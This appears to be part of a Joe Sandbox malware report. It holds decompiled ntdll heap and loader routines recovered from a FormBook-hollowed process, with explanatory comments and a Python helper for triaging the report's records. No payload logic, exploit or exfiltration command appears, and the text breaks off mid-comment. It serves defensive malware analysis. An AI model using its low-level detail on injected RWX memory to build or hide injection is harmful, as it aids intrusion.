                                          						_v12 = _t235 & 0x0000ffff;
                                          						_t138 = _v5;
                                          					}
                                          					 *(_t256 + 2) = _t138;
                                          					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                          					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                          					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                          						_t141 = 0;
                                          					} else {
                                          						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                          						_v40 = _t141;
                                          						if(_t141 >= 0xfe) {
                                          							_push(_t210);
                                          							E01A1A80D(_t236, _t256, _t210, 0);
                                          							_t141 = _v40;
                                          						}
                                          					}
                                          					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                          					 *((char*)(_t256 + 6)) = _t141;
                                          					_t142 = _v12;
                                          					 *_t256 = _t142;
                                          					 *(_t256 + 3) = 0;
                                          					_t211 = _t142 & 0x0000ffff;
                                          					 *((char*)(_t256 + 7)) = 0;
                                          					_v20 = _t211;
                                          					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                          						_t119 = _t256 + 0x10; // -8
                                          						E019AD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                          						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                          						_t211 = _v20;
                                          					}
                                          					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                          					if(_t252 == 0) {
                                          						L56:
                                          						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                          						_t146 = _t206 + 0xc0;
                                          						goto L19;
                                          					} else {
                                          						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                          							L15:
                                          							_t185 = _t211;
                                          							goto L17;
                                          						} else {
                                          							while(1) {
                                          								_t187 =  *_t252;
                                          								if(_t187 == 0) {
                                          									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                          									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                          									goto L17;
                                          								}
                                          								_t252 = _t187;
                                          								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                          									continue;
                                          								}
                                          								goto L15;
                                          							}
                                          							while(1) {
                                          								L17:
                                          								_t212 = E0197AB40(_t206, _t252, 1, _t185, _t211);
                                          								if(_t212 != 0) {
                                          									_t146 = _t206 + 0xc0;
                                          									break;
                                          								}
                                          								_t252 =  *_t252;
                                          								_t211 = _v20;
                                          								_t185 =  *(_t252 + 0x14);
                                          							}
                                          							L19:
                                          							if(_t146 != _t212) {
                                          								_t237 =  *(_t206 + 0x4c);
                                          								_t253 = _v20;
                                          								while(1) {
                                          									__eflags = _t237;
                                          									if(_t237 == 0) {
                                          										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                          									} else {
                                          										_t184 =  *(_t212 - 8);
                                          										_t237 =  *(_t206 + 0x4c);
                                          										__eflags = _t184 & _t237;
                                          										if((_t184 & _t237) != 0) {
                                          											_t184 = _t184 ^  *(_t206 + 0x50);
                                          											__eflags = _t184;
                                          										}
                                          										_t147 = _t184 & 0x0000ffff;
                                          									}
                                          									__eflags = _t253 - (_t147 & 0x0000ffff);
                                          									if(_t253 <= (_t147 & 0x0000ffff)) {
                                          										goto L20;
                                          									}
                                          									_t212 =  *_t212;
                                          									__eflags = _t206 + 0xc0 - _t212;
                                          									if(_t206 + 0xc0 != _t212) {
                                          										continue;
                                          									} else {
                                          										goto L20;
                                          									}
                                          									goto L56;
                                          								}
                                          							}
                                          							L20:
                                          							_t149 =  *((intOrPtr*)(_t212 + 4));
                                          							_t33 = _t256 + 8; // -16
                                          							_t238 = _t33;
                                          							_t254 =  *_t149;
                                          							if( *_t149 != _t212) {
                                          								_push(_t212);
                                          								E01A1A80D(0, _t212, 0, _t254);
                                          							} else {
                                          								 *_t238 = _t212;
                                          								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                          								 *_t149 = _t238;
                                          								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                          							}
                                          							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                          							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                          							if(_t255 == 0) {
                                          								L36:
                                          								if( *(_t206 + 0x4c) != 0) {
                                          									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                          									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                          								}
                                          								_t210 = _v48;
                                          								_t251 = _v12 & 0x0000ffff;
                                          								_t131 = _v20;
                                          								_t235 = _v24 - _t131;
                                          								_v24 = _t235;
                                          								_t256 = _t256 + _t131 * 8;
                                          								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                          									goto L41;
                                          								} else {
                                          									goto L39;
                                          								}
                                          							} else {
                                          								_t216 =  *_t256 & 0x0000ffff;
                                          								_v28 = _t216;
                                          								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                          									L28:
                                          									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                          									_v32 = _t242;
                                          									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                          										_t167 = _t242 + _t242;
                                          									} else {
                                          										_t167 = _t242;
                                          									}
                                          									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                          									_t168 = _t167 << 2;
                                          									_v40 = _t168;
                                          									_t206 = _v44;
                                          									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                          									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                          										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                          									}
                                          									_t217 = _v16;
                                          									if(_t217 != 0) {
                                          										_t173 = _t217 - 8;
                                          										_v52 = _t173;
                                          										_t174 =  *_t173;
                                          										__eflags =  *(_t206 + 0x4c);
                                          										if( *(_t206 + 0x4c) != 0) {
                                          											_t245 =  *(_t206 + 0x50) ^ _t174;
                                          											_v36 = _t245;
                                          											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                          											__eflags = _t245 >> 0x18 - _t225;
                                          											if(_t245 >> 0x18 != _t225) {
                                          												_push(_t225);
                                          												E01A1A80D(_t206, _v52, 0, 0);
                                          											}
                                          											_t174 = _v36;
                                          											_t217 = _v16;
                                          											_t242 = _v32;
                                          										}
                                          										_v28 = _v28 - (_t174 & 0x0000ffff);
                                          										__eflags = _v28;
                                          										if(_v28 > 0) {
                                          											goto L34;
                                          										} else {
                                          											goto L33;
                                          										}
                                          									} else {
                                          										L33:
                                          										_t58 = _t256 + 8; // -16
                                          										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                          										_t206 = _v44;
                                          										_t217 = _v16;
                                          										L34:
                                          										if(_t217 == 0) {
                                          											asm("bts eax, edx");
                                          										}
                                          										goto L36;
                                          									}
                                          								} else {
                                          									goto L24;
                                          								}
                                          								while(1) {
                                          									L24:
                                          									_t182 =  *_t255;
                                          									if(_t182 == 0) {
                                          										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                          										__eflags = _t216;
                                          										goto L28;
                                          									}
                                          									_t255 = _t182;
                                          									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                          										continue;
                                          									} else {
                                          										goto L28;
                                          									}
                                          								}
                                          								goto L28;
                                          							}
                                          						}
                                          					}
                                          					L39:
                                          				} while (_t235 != 0);
                                          				_t214 = _v12;
                                          				_t131 =  *(_t206 + 0x54) ^ _t214;
                                          				 *(_t256 + 4) = _t131;
                                          				if(_t214 == 0) {
                                          					__eflags =  *0x1a48748 - 1;
                                          					if( *0x1a48748 >= 1) {
                                          						_t127 = _t256 + 0xfff; // 0xfff
                                          						_t131 = _t127 & 0xfffff000;
                                          						__eflags = _t131 - _t256;
                                          						if(_t131 != _t256) {
                                          							_t156 =  *[fs:0x30];
                                          							__eflags =  *(_t156 + 0xc);
                                          							if( *(_t156 + 0xc) == 0) {
                                          								_push("HEAP: ");
                                          								E0195B150();
                                          							} else {
                                          								E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          							}
                                          							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                          							_t131 = E0195B150();
                                          							__eflags =  *0x1a47bc8;
                                          							if(__eflags == 0) {
                                          								_t131 = E01A12073(_t206, 1, _t251, __eflags);
                                          							}
                                          						}
                                          					}
                                          				}
                                          				goto L41;
                                          			}

                                          0x00000000
                                          0x0197a983
                                          0x0197a983
                                          0x0197a983
                                          0x0197a987
                                          0x0197a995
                                          0x0197a995
                                          0x0197a995
                                          0x0197a995
                                          0x0197a989
                                          0x0197a98e
                                          0x00000000
                                          0x0197a990
                                          0x00000000
                                          0x0197a990
                                          0x0197a98e
                                          0x00000000
                                          0x0197a983
                                          0x0197a972
                                          0x0197a90a
                                          0x0197aa34
                                          0x0197aa34
                                          0x0197aa40
                                          0x0197aa43
                                          0x0197aa46
                                          0x0197aa4d
                                          0x019c23ab
                                          0x019c23b2
                                          0x019c23b8
                                          0x019c23be
                                          0x019c23c3
                                          0x019c23c5
                                          0x019c23cb
                                          0x019c23d1
                                          0x019c23d5
                                          0x019c23f6
                                          0x019c23fb
                                          0x019c23d7
                                          0x019c23ec
                                          0x019c23f1
                                          0x019c2403
                                          0x019c2408
                                          0x019c2410
                                          0x019c2417
                                          0x019c2422
                                          0x019c2422
                                          0x019c2417
                                          0x019c23c5
                                          0x019c23b2
                                          0x00000000

                                          Strings
                                          • HEAP[%wZ]: , xrefs: 019C22D7, 019C23E7
                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 019C22F3
                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 019C2403
                                          • HEAP: , xrefs: 019C22E6, 019C23F6
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                          • API String ID: 0-1657114761
                                          • Opcode ID: 3c895d81db0a388666cec8f20a809f99b3ea3e1da306504802d4515409b7ce6a
                                          • Instruction ID: c6c2df0a21b0ae2e1be1ba4cd0f58acdfe7e99a9abe2a0db5d4771f5e1b6254e
                                          • Opcode Fuzzy Hash: 3c895d81db0a388666cec8f20a809f99b3ea3e1da306504802d4515409b7ce6a
                                          • Instruction Fuzzy Hash: ACD1DF34A002469FDB19CF68C490BBEB7F6FF88700F188569D98E9B346E330A941CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 69%
                                          			E0197A229(void* __ecx, void* __edx) {
                                          				signed int _v20;
                                          				char _v24;
                                          				char _v28;
                                          				void* _v44;
                                          				void* _v48;
                                          				void* _v56;
                                          				void* _v60;
                                          				void* __ebx;
                                          				signed int _t55;
                                          				signed int _t57;
                                          				void* _t61;
                                          				intOrPtr _t62;
                                          				void* _t65;
                                          				void* _t71;
                                          				signed char* _t74;
                                          				intOrPtr _t75;
                                          				signed char* _t80;
                                          				intOrPtr _t81;
                                          				void* _t82;
                                          				signed char* _t85;
                                          				signed char _t91;
                                          				void* _t103;
                                          				void* _t105;
                                          				void* _t121;
                                          				void* _t129;
                                          				signed int _t131;
                                          				void* _t133;
                                          
                                          				_t105 = __ecx;
                                          				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                          				_t103 = __edx;
                                          				_t129 = __ecx;
                                          				E0197DF24(__edx,  &_v28, _t133);
                                          				// _t129 is the HEAP; Flags live at +0x40 and 0x00040000 is HEAP_CREATE_ENABLE_EXECUTE.
                                          				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                          				// Carry-dependent select: _t121 = 0x40 (PAGE_EXECUTE_READWRITE) for an executable heap,
                                          				// otherwise 0x04 (PAGE_READWRITE). The decompiler's "~_t55" rendering loses the sbb carry.
                                          				asm("sbb edi, edi");
                                          				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                          				if(_t55 != 0) {
                                          					// Argument pattern matches NtQueryVirtualMemory(NtCurrentProcess() /* -1 */, heap,
                                          					// MemoryRegionInformation /* 3 */, &_v24, 0x14, NULL): _v24 receives AllocationBase,
                                          					// _v20 AllocationProtect.
                                          					_push(0);
                                          					_push(0x14);
                                          					_push( &_v24);
                                          					_push(3);
                                          					_push(_t129);
                                          					_push(0xffffffff);
                                          					_t57 = E01999730();
                                          					__eflags = _t57;
                                          					if(_t57 < 0) {
                                          						L17:
                                          						_push(_t105);
                                          						E01A1A80D(_t129, 1, _v20, 0);
                                          						_t121 = 4;
                                          						goto L1;
                                          					}
                                          					// 0x60 = PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE: unless the heap's region was
                                          					// allocated executable, fall back (L17) to committing with PAGE_READWRITE.
                                          					__eflags = _v20 & 0x00000060;
                                          					if((_v20 & 0x00000060) == 0) {
                                          						goto L17;
                                          					}
                                          					__eflags = _v24 - _t129;
                                          					if(_v24 == _t129) {
                                          						goto L1;
                                          					}
                                          					goto L17;
                                          				}
                                          				L1:
                                          				// ZwAllocateVirtualMemory(NtCurrentProcess() /* -1 */, &BaseAddress, 0, &RegionSize,
                                          				// MEM_COMMIT /* 0x1000 */, Protect = _t121); identified by the failure message below.
                                          				_push(_t121);
                                          				_push(0x1000);
                                          				_push(_t133 + 0x14);
                                          				_push(0);
                                          				_push(_t133 + 0x20);
                                          				_push(0xffffffff);
                                          				_t61 = E01999660();
                                          				_t122 = _t61;
                                          				if(_t61 < 0) {
                                          					_t62 =  *[fs:0x30]; // fs:[0x30] is the PEB on x86
                                          					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                          					__eflags =  *(_t62 + 0xc); // PEB+0xc = Ldr
                                          					if( *(_t62 + 0xc) == 0) {
                                          						_push("HEAP: ");
                                          						E0195B150();
                                          					} else {
                                          						// Ldr->InLoadOrderModuleList.Flink (+0xc) is the main image's LDR_DATA_TABLE_ENTRY;
                                          						// +0x2c is its BaseDllName (UNICODE_STRING), printed with %wZ. E0195B150 is the
                                          						// DbgPrint-style routine used for all three messages.
                                          						E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					_push( *((intOrPtr*)(_t133 + 0xc)));
                                          					_push( *((intOrPtr*)(_t133 + 0x14)));
                                          					_push(_t129);
                                          					E0195B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                          					_t65 = 0;
                                          					L13:
                                          					return _t65;
                                          				}
                                          				// 0x7ffe0380 lies in KUSER_SHARED_DATA (mapped at 0x7ffe0000). The three flag checks
                                          				// that follow only gate calls into E01A11582 with heap counters, which is consistent
                                          				// with event-tracing bookkeeping rather than allocation logic.
                                          				_t71 = E01977D50();
                                          				_t124 = 0x7ffe0380;
                                          				if(_t71 != 0) {
                                          					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				} else {
                                          					_t74 = 0x7ffe0380;
                                          				}
                                          				if( *_t74 != 0) {
                                          					_t75 =  *[fs:0x30];
                                          					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                          					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                          						E01A1138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                          					}
                                          				}
                                          				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                          				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                          				if(E01977D50() != 0) {
                                          					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				} else {
                                          					_t80 = _t124;
                                          				}
                                          				if( *_t80 != 0) {
                                          					_t81 =  *[fs:0x30];
                                          					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                          					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                          						__eflags = E01977D50();
                                          						if(__eflags != 0) {
                                          							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          						}
                                          						E01A11582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                          					}
                                          				}
                                          				_t82 = E01977D50();
                                          				_t125 = 0x7ffe038a;
                                          				if(_t82 != 0) {
                                          					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          				} else {
                                          					_t85 = 0x7ffe038a;
                                          				}
                                          				if( *_t85 != 0) {
                                          					__eflags = E01977D50();
                                          					if(__eflags != 0) {
                                          						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          					}
                                          					E01A11582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                          				}
                                          				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                          				// _t103 is the HEAP_ENTRY; its Flags byte is at +2. 0xfeeefeee is the NT heap's fill
                                          				// pattern for free memory, written over the newly committed range when the entry's
                                          				// fill-pattern flag (0x04) is set, which is why freed heap shows up as feeefeee in dumps.
                                          				_t91 =  *(_t103 + 2);
                                          				if((_t91 & 0x00000004) != 0) {
                                          					E019AD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                          					_t91 =  *(_t103 + 2);
                                          				}
                                          				 *(_t103 + 2) = _t91 & 0x00000017; // keep only the low flag bits
                                          				_t65 = 1;
                                          				goto L13;
                                          			}

                                          Instruction addresses of the C-Code lines above: 0x0197a229-0x0197a308 (main body) and 0x019c1c76-0x019c1e06 (out-of-line blocks).

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 2994545307-2586055223
                                          • Opcode ID: 49f0715d43111c81fd6b335ae9516e63e15033c7d2be4856c9c1961cfdc85d00
                                          • Instruction ID: 5185ebcbbb43a77233d0a6a8a52e8b434dd436bd23d704b2ac224f290b98e520
                                          • Opcode Fuzzy Hash: 49f0715d43111c81fd6b335ae9516e63e15033c7d2be4856c9c1961cfdc85d00
                                          • Instruction Fuzzy Hash: A55106322056819FD712DB68C848F6B7BE9FF80B50F090868F999CB292D734D900CB66
                                          Uniqueness

                                          Uniqueness Score: -1.00%
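
The records on this page (C-Code block, Strings, Memory Dump Source, Similarity) are the unit an analyst actually triages, and in this dump a large share of them are ntdll heap and loader routines that were carried along with the hollowed process image rather than FormBook's own logic. The following is an added example and not part of the Joe Sandbox report: a small parser for this record layout that pulls out the function name, decompilation quality, recovered strings, source dump file and fuzzy hash, decodes the dump file name, and flags records whose strings are Windows-internal debug text. The meaning of the dotted fields in the .sdmp name (process index, region base, page protection) is an assumption checked against the report's own `Offset: 01930000`; the library-string markers are a heuristic chosen here, not a Joe Sandbox rule; the sample input is constructed from the two records on this page (E0197A229 and E01988E00).

```python
"""Triage helper for Joe Sandbox per-function disassembly records (added example).

Parses the 'C-Code - Quality / Strings / Memory Dump Source / Similarity' records
and separates decompiled Windows library code from functions still worth reading.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# winnt.h page-protection constants; the dump name on this page carries 0x40.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Heuristic chosen for this example: ntdll debug text and source paths mark
# copied-in library code.  No marker does NOT prove a function is payload code.
LIBRARY_MARKERS = ("minkernel\\", "HEAP[%wZ]", "HEAP: ", "ZwAllocateVirtualMemory", "Ldrp")

FUNC_RE = re.compile(r"^\s*(E[0-9A-F]{8})\(")
QUALITY_RE = re.compile(r"C-Code - Quality:\s*(\d+)%")
STRING_RE = re.compile(r"^\s*•\s*(.*?),\s*xrefs:\s*[0-9A-Fa-f, ]+$")
SOURCE_RE = re.compile(r"Source File:\s*(\S+\.sdmp)")
KV_RE = re.compile(r"^\s*•\s*(API ID|String ID|Instruction Fuzzy Hash):\s*(.*)$")

# Constructed sample in the report's layout, built from the two records above.
SAMPLE = r"""
C-Code - Quality: 69%
            E0197A229(void* __ecx, void* __edx) {
                E0195B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
            }
Strings
Memory Dump Source
• Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
• API String ID: 2994545307-2586055223
• Instruction Fuzzy Hash: A55106322056819FD712DB68C848F6B7BE9FF80B50F090868F999CB292D734D900CB66
Uniqueness Score: -1.00%
C-Code - Quality: 44%
            E01988E00(void* __ecx) {
            }
Strings
• LdrpFindDllActivationContext, xrefs: 019C9331, 019C935D
• minkernel\ntdll\ldrsnap.c, xrefs: 019C933B, 019C9367
Memory Dump Source
• Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
Similarity
• API ID:
• String ID:
"""


@dataclass
class FunctionRecord:
    name: str
    quality: int
    strings: List[str] = field(default_factory=list)
    source_file: Optional[str] = None
    api_id: str = ""
    string_id: str = ""
    fuzzy_hash: str = ""

    def all_strings(self) -> List[str]:
        # 'String ID' repeats the strings joined by '$'; use it when the
        # Strings section is empty, as it is for E0197A229 on this page.
        return self.strings + [s for s in self.string_id.split("$") if s]


def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    in_strings = False
    for line in text.splitlines():
        q = QUALITY_RE.search(line)
        if q:                                  # each record starts at its C-Code header
            cur = FunctionRecord(name="", quality=int(q.group(1)))
            records.append(cur)
            in_strings = False
            continue
        if cur is None:
            continue
        if not cur.name:                       # first line after the header is the signature
            f = FUNC_RE.match(line)
            if f:
                cur.name = f.group(1)
            continue
        head = line.strip()
        if head == "Strings":
            in_strings = True
            continue
        if head in ("Memory Dump Source", "Similarity", "Uniqueness"):
            in_strings = False
        if in_strings:
            s = STRING_RE.match(line)
            if s:
                cur.strings.append(s.group(1))
            continue
        src = SOURCE_RE.search(line)
        if src:
            cur.source_file = src.group(1)
            continue
        kv = KV_RE.match(line)
        if kv:
            key, val = kv.group(1), kv.group(2).strip()
            if key == "API ID":
                cur.api_id = val
            elif key == "String ID":
                cur.string_id = val
            else:
                cur.fuzzy_hash = val
    return records


def decode_dump_name(name: str) -> Dict[str, object]:
    """Split '<proc>.<round>.<id>.<base>.<protect>.<type>.sdmp' into fields.

    Assumption (not documented on the page): the fourth dotted field is the region
    base, which agrees with the report's 'Offset: 01930000', and the fifth is the
    page protection of the dumped region.
    """
    parts = name.rsplit(".sdmp", 1)[0].split(".")
    if len(parts) != 6:
        raise ValueError(f"unexpected dump file name: {name}")
    base, prot = int(parts[3], 16), int(parts[4], 16)
    return {
        "process_index": int(parts[0]),
        "base": base,
        "protection": prot,
        "protection_name": PAGE_PROTECTION.get(prot, hex(prot)),
    }


def classify(rec: FunctionRecord) -> str:
    """'windows_library' when any recovered string is an ntdll marker, else 'unattributed'."""
    if any(m in s for s in rec.all_strings() for m in LIBRARY_MARKERS):
        return "windows_library"
    return "unattributed"


def triage(text: str) -> List[Dict[str, object]]:
    rows = []
    for rec in parse_records(text):
        dump = decode_dump_name(rec.source_file) if rec.source_file else {}
        rows.append({
            "function": rec.name,
            "quality": rec.quality,
            "class": classify(rec),
            "rwx_region": dump.get("protection") == 0x40,  # injected code usually sits in RWX
            **dump,
        })
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(f"{row['function']}  quality={row['quality']:>3}%  {row['class']:<16} "
              f"base={row.get('base', 0):#010x} prot={row.get('protection_name')}")
```

Run against the full text of the Disassembly section, the `windows_library` rows can be set aside and the `unattributed` ones in the RWX region read first; the classification is only as good as the marker list, so a function with no recovered strings stays `unattributed` rather than being called payload code.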

                                          C-Code - Quality: 44%
                                          			E01988E00(void* __ecx) {
                                          				signed int _v8;
                                          				char _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr* _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t43;
                                          				void* _t46;
                                          				intOrPtr _t47;
                                          				void* _t48;
                                          				signed int _t49;
                                          				void* _t50;
                                          				intOrPtr* _t51;
                                          				signed int _t52;
                                          				void* _t53;
                                          				intOrPtr _t55;
                                          
                                          				_v8 =  *0x1a4d360 ^ _t52; // /GS stack cookie: global security cookie XOR ESP, verified before return
                                          				_t49 = 0; // NTSTATUS
                                          				_t48 = __ecx; // LDR_DATA_TABLE_ENTRY of the module being loaded
                                          				// Function pointer installed at run time (0x73b80110 is outside this ntdll image);
                                          				// with no prober installed there is nothing to do.
                                          				_t55 =  *0x1a48464; // 0x73b80110
                                          				if(_t55 == 0) {
                                          					L9:
                                          					// "!_t49 >= 0" is the decompiler's rendering of NT_ERROR(status). 0x1a45780 is a
                                          					// loader debug-flag bitmask: bits 0x3 enable the diagnostic print (file, line and
                                          					// function name, which identifies this routine as LdrpFindDllActivationContext),
                                          					// bit 0x10 breaks into the debugger.
                                          					if( !_t49 >= 0) {
                                          						if(( *0x1a45780 & 0x00000003) != 0) {
                                          							E019D5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                          						}
                                          						if(( *0x1a45780 & 0x00000010) != 0) {
                                          							asm("int3");
                                          						}
                                          					}
                                          					return E0199B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49); // cookie check, then return status
                                          				}
                                          				_t47 =  *((intOrPtr*)(__ecx + 0x18)); // +0x18 = DllBase
                                          				_t43 =  *0x1a47984; // 0x1692b20
                                          				// PEB+0x1f8 (x86) = ActivationContextData. Skip probing only when a process-wide
                                          				// context already exists and this entry is the one held at 0x1a47984 (consistent
                                          				// with the main image's entry, see the path fix-up below).
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                          					_t32 =  *((intOrPtr*)(_t48 + 0x28)); // +0x28 = FullDllName.Buffer
                                          					if(_t48 == _t43) {
                                          						// Strip a leading L"\??\" from L"\??\X:\..." (skip 8 bytes = 4 wide chars)
                                          						// so the prober receives a Win32 path.
                                          						_t50 = 0x5c;
                                          						if( *_t32 == _t50) {
                                          							_t46 = 0x3f;
                                          							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                          								_t32 = _t32 + 8;
                                          							}
                                          						}
                                          					}
                                          					// Indirect call through the run-time-installed prober. The two-statement shape is
                                          					// how the decompiler renders a guarded indirect call: the routine at 0x1a4b1e0
                                          					// validates the target, then _t51(DllBase, FullDllPath, &ActivationContext) runs;
                                          					// the arguments shown on the first line belong to the call of _t51.
                                          					_t51 =  *0x1a48464; // 0x73b80110
                                          					 *0x1a4b1e0(_t47, _t32,  &_v12);
                                          					_t49 =  *_t51();
                                          					if(_t49 >= 0) {
                                          						L8:
                                          						_t35 = _v12;
                                          						if(_t35 != 0) {
                                          							// +0x48 = EntryPointActivationContext (x86 LDR_DATA_TABLE_ENTRY): release any
                                          							// previous context (E01989B10) before storing the one the prober returned.
                                          							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                          								E01989B10( *((intOrPtr*)(_t48 + 0x48)));
                                          								_t35 = _v12;
                                          							}
                                          							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                          						}
                                          						goto L9;
                                          					}
                                          					// "No manifest" outcomes are not failures: STATUS_RESOURCE_TYPE_NOT_FOUND (0xc000008a),
                                          					// STATUS_RESOURCE_NAME_NOT_FOUND (0xc000008b), STATUS_RESOURCE_DATA_NOT_FOUND (0xc0000089),
